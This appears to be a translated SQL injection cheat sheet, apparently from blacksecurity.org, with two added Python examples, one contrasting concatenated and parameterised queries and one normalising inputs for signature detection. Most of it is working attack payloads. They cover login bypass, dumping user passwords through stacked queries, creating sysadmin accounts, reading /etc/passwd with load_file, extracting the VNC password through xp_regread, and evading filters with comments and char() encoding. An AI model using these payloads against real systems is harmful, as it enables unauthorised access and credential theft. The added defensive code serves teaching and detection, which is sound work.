Author: zeroday
Organization: blacksecurity.org
Translation: Floating Dust [S.S. T]
1. Introduction
2. Vulnerability Testing
3. Collect information
4. Database Types (system tables)
5. Get the password
6. Create a database account
7. Interaction of the MYSQL Operating System
8. server name and Configuration
9. Obtain the VNC password from the Registry
10. Evading signatures
11. Using char() to bypass MySQL input validation
12. Evading signatures with comments
13. Strings without quotation marks
1. Introduction
When a server exposes only port 80, it is almost certain that the administrator keeps the server itself patched, so the best way in is the website. SQL injection is one of the most common website attack methods.
Web applications (ASP, JSP, PHP, CGI, ...) are a far softer target than the operating system running on the server.
SQL injection means smuggling a query or a command into the database through input entered on a web page. Many websites take parameters such as the user name, the password, or even the e-mail address from the user and feed them straight into SQL query commands.
2. Vulnerability Testing
First, try the simplest probes:
- Login: ' or 1=1 --
- Pass: ' or 1=1 --
- http://website/index.asp?id=' or 1=1 --
These are the basic forms. Others are:
- ' having 1=1 --
- ' group by userid having 1=1 --
- ' select name from syscolumns where id = (select id from sysobjects where name = 'tablename') --
- ' union select sum(columnname) from tablename --
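What decides whether the probes above succeed is how the application builds its query. The following is an added example, not code from the original article: a constructed in-memory SQLite table with one user, a login function that concatenates the input into the SQL string (the pattern the probes exploit) and the same query with bound parameters. It also shows that a lone quote makes the concatenated version raise a database error, which is the signal the probes look for and which a server should log rather than return to the client.

```python
import sqlite3


def make_db():
    # Constructed sample data: a single user table with one row.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret')")
    return conn


def vulnerable_login(conn, login, password):
    """Builds the query by string concatenation, so a quote in the
    input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT login FROM users WHERE login = '" + login
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, login, password):
    """Same query with bound parameters: the input is always data,
    never part of the statement text."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone() is not None


def error_leaks(conn, probe):
    """True if the concatenated query fails with a database error on the
    given probe (e.g. a single quote); that error text is what should be
    logged server-side and never shown to the client."""
    try:
        vulnerable_login(conn, probe, "x")
        return False
    except sqlite3.Error:
        return True


def demo():
    conn = make_db()
    payload = "' or 1=1 --"
    return {
        "vulnerable_bypassed": vulnerable_login(conn, payload, "wrong"),
        "safe_bypassed": safe_login(conn, payload, "wrong"),
        "safe_valid_user": safe_login(conn, "alice", "secret"),
        "quote_probe_errors": error_leaks(conn, "'"),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated version evaluates `login = '' or 1=1 --' AND password = 'wrong'`, where the `--` comments out the password check; the parameterised version looks for a user literally named `' or 1=1 --` and finds none.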
3. Collect information
- ' or 1 in (select @@version) --
- ' union all select @@version --   (this one works well)
These reveal the exact database version, the operating system, and the patch level.
4. Database Types (system tables)
Oracle extensions
--> SYS.USER_OBJECTS
--> SYS.USER_VIEWS
--> SYS.USER_TABLES
--> SYS.USER_TAB_COLUMNS
--> SYS.USER_CATALOG
--> SYS.USER_TRIGGERS
--> SYS.ALL_TABLES
--> SYS.TAB
MySQL (on Windows, C:\WINDOWS> type my.ini can reveal the root password)
--> mysql.user
--> mysql.host
--> mysql.db
MS Access
--> MSysACEs
--> MSysObjects
--> MSysQueries
--> MSysRelationships
MS SQL Server
--> sysobjects
--> syscolumns
--> systypes
--> sysdatabases
5. Get the password
'; begin declare @var varchar(8000) set @var = ':' select @var = @var + ' ' + login + '/' + password + ' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp) --
'; drop table temp --
6. Create a database account
MS SQL
exec sp_addlogin 'name', 'password'
exec sp_addsrvrolemember 'name', 'sysadmin'   -- adds the login as a database administrator
MySQL
insert into mysql.user (user, host, password) values ('name', 'localhost', PASSWORD('pass123'))
Access
create user name identified by 'pass123'
Postgres (requires a Unix account)
create user name with password 'pass123'
Oracle
create user name identified by pass123
temporary tablespace temp
default tablespace users;
grant connect to name;
grant resource to name;
7. Interaction of the MYSQL Operating System
- ' union select 1, load_file('/etc/passwd'), 1; --   (uses MySQL's load_file() function to read a file from the database server's filesystem)
8. Server name and configuration
- ' and 1 in (select @@servername) --
- ' and 1 in (select servername from master..sysservers) --
9. Obtain the VNC password from the Registry
'; declare @out binary(8)
exec master..xp_regread
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\ORL\WinVNC3\Default',   /* the VNC4 path is slightly different */
@value_name = 'password',
@value = @out output
select cast(@out as bigint) as x into TEMP --
' and 1 in (select cast(x as varchar) from temp) --
10. Evading signatures
Alternatives to the well-known or 1=1 signature:
- ' or 'unusual' = 'unusual'
- ' or 'something' = 'some' + 'thing'
- ' or 'text' = N'text'
- ' or 'something' like 'some%'
- ' or 2 > 1
- ' or 'text' > 't'
- ' or 'whatever' in ('whatever')
- ' or 2 between 1 and 3
11. Using char() to bypass MySQL input validation
No quotation marks needed (string = "%"):
--> ' or username like char(37);
Quoted string (string = "root"):
--> ' union select * from users where login = char(114,111,111,116);
Loading a file inside a union (string = "/etc/passwd"):
--> ' union select 1, (load_file(char(47,101,116,115,115,119,100,))), 1;
Checking whether a file exists (string = "n.ext"):
--> ' and 1 = (if(load_file(char(101,120,116,)) <> char()));
12. Evading signatures with comments
--> /**/OR/**/1/**/=/**/1
--> Username: ' or 1 /*
--> Password: */ = 1 --
--> UNI/**/ON SEL/**/ECT
--> (Oracle): '; execute immediate 'sel' || 'ect us' || 'er'
--> (MS SQL): '; EXEC ('SEL' + 'ECT US' + 'ER')
13. Strings without quotation marks
--> insert into Users (Login, Password, Level) values (char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
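Sections 10 to 13 are all ways of making a payload look unlike the signature a filter expects. The following added example (my own code, not part of the original sheet) shows the defender's counterpart: a normaliser that strips inline comments, decodes char() sequences (decimal and 0x forms), merges quoted-literal concatenation, and drops the N prefix, so that signatures are matched against what the database would see rather than against the attacker's spelling. A naive substring check for `or 1=1` is included to show what it misses. The signature names and the sample probes are my own constructions; the comment handling assumes, as the sheet does in section 12, that `/**/` can be removed outright.

```python
import re

# Signatures applied to the *normalized* text; names are my own labels.
SIGNATURES = {
    "tautology": r"(?<![a-z])or(?![a-z])\s*('[^']*'|\d+)\s*(=|>|<|\blike\b|\bin\b|\bbetween\b)",
    "union_select": r"\bunion\b(\s+all)?\s+select\b",
    "dynamic_exec": r"\bexec(ute)?\b\s*(immediate\b|\()",
    "stacked_statement": r";\s*(begin|declare|drop|insert|create)\b",
    "registry_read": r"xp_regread",
}


def _decode_char(m):
    # char(114,111,111,116) or char(0x70): turn the code list into a literal.
    codes = re.findall(r"0x[0-9a-f]+|\d+", m.group(1))
    text = "".join(chr(int(c, 16)) if c.startswith("0x") else chr(int(c))
                   for c in codes)
    return "'" + text + "'"


def normalize(s):
    """Reduce the obfuscations of sections 10-13 to their plain form."""
    t = s.lower()
    t = re.sub(r"/\*.*?\*/", "", t, flags=re.S)            # section 12: /**/ removed
    t = re.sub(r"\bchar\s*\(([^()]*)\)", _decode_char, t)  # sections 11, 13
    t = re.sub(r"\bn'", "'", t)                            # N'text' -> 'text'
    t = re.sub(r"'\s*(\+|\|\|)\s*'", "", t)                # 'a'+'b' / 'a'||'b' -> 'ab'
    return re.sub(r"\s+", " ", t).strip()


def naive_match(s):
    """The kind of fixed-string signature the sheet shows how to evade."""
    return "or 1=1" in s.lower()


def classify(s):
    """Names of the signatures that fire on the normalized input."""
    n = normalize(s)
    return sorted(name for name, pat in SIGNATURES.items() if re.search(pat, n))


def demo():
    # Constructed probes, taken from the forms listed in sections 10-13.
    probes = [
        "' or 2 > 1",
        "' or 'text' = N'text'",
        "UNI/**/on sel/**/ECT 1",
        "'; EXEC('SEL'+'ECT US'+'ER')",
        "' union select * from users where login = char(114,111,111,116);",
        "alice",
    ]
    return {p: (naive_match(p), classify(p)) for p in probes}


if __name__ == "__main__":
    for probe, (naive, names) in demo().items():
        print(f"{probe!r:70} naive={naive!s:5} normalized={names}")
```

Two design notes. The regexes are deliberately narrow (a quoted literal or a number on the left of the comparison) so that ordinary text containing "or" or "in" is not flagged; widen them only with a false-positive budget in mind. Removing `/**/` outright follows the sheet's splitting trick; on an engine that treats a comment as whitespace you would substitute a space instead, and the keyword-split form `UNI/**/ON` would then simply fail to parse rather than need detecting.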